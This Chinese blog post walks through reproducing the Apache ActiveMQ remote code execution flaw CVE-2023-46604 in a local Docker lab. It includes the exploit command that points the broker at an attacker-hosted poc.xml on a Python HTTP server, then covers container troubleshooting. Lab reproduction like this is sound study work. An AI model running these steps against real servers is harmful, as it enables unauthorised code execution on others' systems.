当前位置: 首页 > news >正文

CVE-2023-46604 Apache ActiveMQ 远程代码执行漏洞 (复现)

root身份打开CVE-2023-46604目录终端执行代码:
docker compose up -d启动容器
成功访问ip:8161端口,此漏洞核心在61616端口
image

漏洞目录下有poc.xml文件,启动 HTTP 反连服务器
python3 -m http.server 6666
image

执行漏洞利用脚本
python3 poc.py 192.168.75.132 61616 http://ip:6666/poc.xml
此时反连服务器会有响应即为成功!

漏洞验证
执行docker exec cve-2023-46604-activemq-1 ls -l /tmp
看到activeMQ-RCE-success
image
漏洞复现成功!

复现中遇到的问题(可能会出现)
最初我在运行python3 poc.py 192.168.75.132 61616 http://192.168.75.132:6666/poc.xml命令时,
出现ConnectionRefusedError: [Errno 111] Connection refused错误(说白了就是docker没正常运行),
逐一排查后总结原因如下
docker日志报错主要是java.lang.NullPointerException/opt/activemq/bin/activemq: 1: ps: not found

解决方法:
docker compose down停止容器
编辑目录下的docker-compose.yml文件
在image和port中间添加一行command: sleep infinity
意思是临时改动启动命令,让容器启动后不退出
docker compose up -d启动容器
docker exec -it cve-2023-46604-activemq-1 /bin/sh进入docker容器的shell
apt-get update && apt-get install -y procps安装procps,Ubuntu默认安装
exit退出容器

把刚开始在docker-compose.yml文件下添加的command一行删除后
在文件里添加
environment:
- ACTIVEMQ_OPTS=-XX:-UseContainerSupport
强制禁用容器内的 cgroup 检测,避免触发空指针异常。

执行docker compose down
docker compose up -d重启容器

执行docker ps | grep activemq查看容器状态(应为UP)
执行docker logs cve-2023-46604-activemq-1查看日志(无报错)

重新成功执行python3 poc.py 192.168.75.132 61616 http://192.168.75.132:6666/poc.xml命令,
反连服务器会返回结果

http://www.wuyegushi.com/news/64.html

相关文章:

  • Day26
  • 假期学习
  • 第二十四天
  • 在python虚拟环境中遇到 ​​No module named pip​​ 错误解决方案
  • 从零开始的web前端学习-React
  • tinymce富文本编辑器使用
  • 微软C语言编译器‘strcpy‘: This function or variable may be unsafe. Consider using strcpy_s instead
  • Java学习Day26
  • 线性基(个人学习笔记)
  • 花菖蒲 2025.7.26 模拟赛题解
  • 信任的意外反射:深入解析LLVM循环向量化器中的罕见编译错误
  • P1429 平面最近点对(加强版)[骗分解法]
  • 7.26 - GENGAR
  • P4565 [CTSC2018] 暴力写挂 题解
  • 第十二篇
  • 计算机网络——应用层 - 浪矢
  • 《第一节:跟着符映维学C语言---配置c语言开发环境》
  • 再见,大连
  • 影视软件集合分享
  • 7.26总结
  • geogebra 2 进阶
  • 20250726GF模拟赛
  • java学习
  • 深入解析Passkeys背后的密码学原理
  • CCF中学生计算机程序设计-基础篇-第一章-函数练习答案
  • 第二次总结——关系中的魔法语言
  • 2025.7 Solar应急响应-
  • 【计算几何】Largest Quadrilateral
  • 2025暑假qbxtNOIP实战梳理营Day1题目
  • 请求类型绑定响应类型